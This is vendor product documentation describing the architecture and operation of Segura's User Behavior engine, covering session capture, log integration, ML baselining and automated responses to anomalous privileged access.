About Architecture and operation

  • 2 minute(s) read
Prev Next

Data flow and event capture

Segura's User Behavior engine is designed to continuously capture, analyze, and correlate privileged access events across multiple vectors of the infrastructure. The data flow consists of:

  • Monitored Sessions: Real-time activity capture in RDP, SSH, Web (HTML5), database, API, local application, and remote endpoint sessions.
  • Integration with Logs and Auditing: Consumes Segura's internal records (audit logs, session recordings, credential checkout logs) and can integrate external logs from SIEM, SOAR, EDR, Threat Intelligence, and ITSM for expanded context.
  • Contextual Metadata: Includes information about the device, location, network, time, access method, credential type, applied policy, geographic origin, and user history.
  • Triggered Events: Every user action, credential checkout, session start/end, command execution, secret retrieval. It’s enriched and registered with complete context, forming a detailed and correlatable timeline.

Analytics engine and processing layers

The core of Segura's Analytics Behavior platform follows a multi-layered processing model:

  • Collection layer: aggregates data from live sessions, event logs, external integrations, and security signals. Supports massive ingestion without performance degradation.
  • Analysis and correlation: normalizes, enriches, and correlates events across multiple domains. Goes beyond isolated actions, analyzing sequences, frequency, deviations, and interactions.
  • Baseline modeling: creates dynamic behavioral profiles for each user, credential, and asset, using machine learning to define what is common considering times, commands, devices, typing patterns, accessed resources, session durations, etc.
  • Real-time evaluation and dynamic limits: new events are compared with the baseline using adaptive limits (adjusted by AI/ML). This allows for the identification of anomalies even when patterns change gradually.
  • Response orchestration and triggers: upon detecting deviation or suspicious behavior (e.g., out-of-hours access, excessive viewing, use of a new device, abnormal command), the system triggers adaptive responses such as alerts, MFA, session suspension, or automatic integration with SOAR for containment.

Integration with logs, sessions, and external data

  • Sessions: all session events (RDP, SSH, web, API, database) are correlated with the user's historical behavior and active context.
  • Logs and auditing: every action, evaluation, and response is immutably registered, forming a detailed trail for compliance, forensic investigation, and regulatory reporting.
  • External signals: the Behavior Engine can consume risk indicators from external systems (SIEM, SOAR, EDR, Threat Intelligence), increasing threat detection accuracy and enabling automated responses based on external events (such as instant blocking in case of confirmed IOC).

Decision and orchestration flow

Typical decision and orchestration flow:

  1. Action: user performs an activity (e.g., starts a session, queries a password, executes a command).
  2. Capture and enrichment: event is registered with full context (who, when, where, how, and why).
  3. Baseline evaluation: system compares current behavior with individual baseline and risk model.
  4. Thresholds and dynamic evaluation: if the behavior is within expectations, access proceeds normally. If it exceeds dynamic thresholds, triggers are activated.
  5. Automated response: depending on the level of risk and policy, the system can alert the team, require MFA, suspend the session, revoke access, or trigger automated playbooks via SOAR.

Security, compliance and value

  • Adaptive security: the engine adjusts in real-time to changes in behavior, reducing the response time to internal threats or compromised accounts.
  • Automated execution: suspicious or anomalous actions result in immediate execution of policies, without the need for manual intervention.
  • Reporting and compliance: reports and dashboards offer complete visibility for risk management, auditing, and compliance with regulations.